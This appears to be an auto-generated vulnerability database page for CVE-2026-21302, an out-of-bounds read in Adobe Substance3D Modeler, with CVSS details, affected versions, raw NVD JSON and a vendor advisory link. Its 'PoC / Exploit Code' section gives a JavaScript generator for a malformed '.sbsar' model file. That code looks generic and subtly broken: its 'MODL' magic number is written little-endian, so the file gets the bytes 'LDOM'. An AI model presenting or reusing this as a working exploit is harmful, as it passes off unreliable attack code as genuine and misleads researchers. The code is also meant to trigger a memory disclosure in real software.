Security Vulnerability Report
CVE-2026-21302 CVSS 5.5 MEDIUM

CVE-2026-21302

Published: 2026-01-13 21:15:54
Last Modified: 2026-01-14 17:58:14

Description

Substance3D - Modeler versions 1.22.4 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:* - VULNERABLE
Adobe Substance3D Modeler <= 1.22.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-21302 PoC - Malicious 3D Model File Generator
// This PoC demonstrates the structure needed to trigger the out-of-bounds read
// Use with caution and only for authorized security testing
const fs = require('fs');

function createMaliciousModelFile() {
  // Craft a malformed 3D model file header
  const header = Buffer.alloc(64);
  header.writeUInt32LE(0x4D4F444C, 0);  // Magic number 'MODL'
  header.writeUInt32LE(1, 4);           // Version
  header.writeUInt32LE(0xFFFFFFFF, 8);  // Malformed vertex count
  header.writeUInt32LE(0xFFFFFFFF, 12); // Malformed index count

  // Craft vertex data with oversized values
  const vertexData = Buffer.alloc(1024);
  for (let i = 0; i < 256; i++) {
    vertexData.writeFloatLE(999999.0, i * 4); // Out of range coordinates
  }

  // Craft malformed texture coordinates
  const texCoordData = Buffer.alloc(512);
  texCoordData.fill(0xFF);

  // Combine all sections
  const maliciousFile = Buffer.concat([header, vertexData, texCoordData]);

  // Save as a 3D model file
  fs.writeFileSync('malicious_model.sbsar', maliciousFile);
  console.log('Malicious model file created: malicious_model.sbsar');
  console.log('File size:', maliciousFile.length, 'bytes');
}

createMaliciousModelFile();

References

https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21302", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:53.960", "lastModified": "2026-01-14T17:58:14.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.4 and earlier are affected by an Out-of-bounds Read vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Substance3D - Modeler versiones 1.22.4 y anteriores se ven afectadas por una vulnerabilidad de lectura fuera de límites (Out-of-bounds Read) que podría conducir a la exposición de memoria. Un atacante podría aprovechar esta vulnerabilidad para divulgar información sensible almacenada en memoria. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.5", "matchCriteriaId": "D5A6870D-D2DE-4B8F-8680-3717CA179D14"}]}]}], "references": [{"url": 
"https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}